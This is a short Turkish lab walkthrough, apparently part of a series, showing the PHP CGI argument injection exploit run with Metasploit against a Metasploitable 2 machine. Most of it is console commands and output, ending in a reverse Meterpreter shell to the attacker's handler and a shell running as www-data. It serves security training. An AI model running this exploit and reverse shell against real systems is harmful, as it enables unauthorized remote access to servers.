Metasploitable 2 Exploit PHP CGI
Exploit # 11 : PHP CGI
PHP CGI ile kullanıcı ile sunucu arasında etkileşimde kullanılan bir modüldür. Kullanıcı tarafından gönderilen istekler ile sunucu tarafında iş yaptırılır.
msf exploit(java_rmi_server) > search php cgi
Matching Modules
================
Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/linux/http/linksys_apply_cgi 2005-09-13 00:00:00 UTC great Linksys WRT54 Access Point apply.cgi Buffer Overflow
exploit/multi/http/php_cgi_arg_injection 2012-05-03 00:00:00 UTC excellent PHP CGI Argument Injection
exploit/unix/webapp/awstats_migrate_exec 2006-05-04 00:00:00 UTC excellent AWStats migrate Remote Command Execution
exploit/windows/http/php_apache_request_headers_bof 2012-05-08 00:00:00 UTC normal PHP apache_request_headers Function Buffer Overflow
msf exploit(java_rmi_server) > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options
Module options (exploit/multi/http/php_cgi_arg_injection):
Name Current Setting Required Description
—- ————— ——– ———–
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
TARGETURI no The URI to request (must be a CGI-handled PHP script)
URIENCODING 0 yes Level of URI URIENCODING and padding (0 for minimum)
VHOST no HTTP server virtual host
Exploit target:
Id Name
— —-
0 Automatic
msf exploit(php_cgi_arg_injection) > set RHOST 172.16.52.133
RHOST => 172.16.52.133
msf exploit(php_cgi_arg_injection) > exploit
[*] Started reverse handler on 172.16.52.128:4444
[*] Sending stage (39217 bytes) to 172.16.52.133
[*] Meterpreter session 2 opened (172.16.52.128:4444 -> 172.16.52.133:40242) at 2013-07-28 14:32:51 +0300
meterpreter > shell
Process 25618 created.
Channel 0 created.
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
www-data
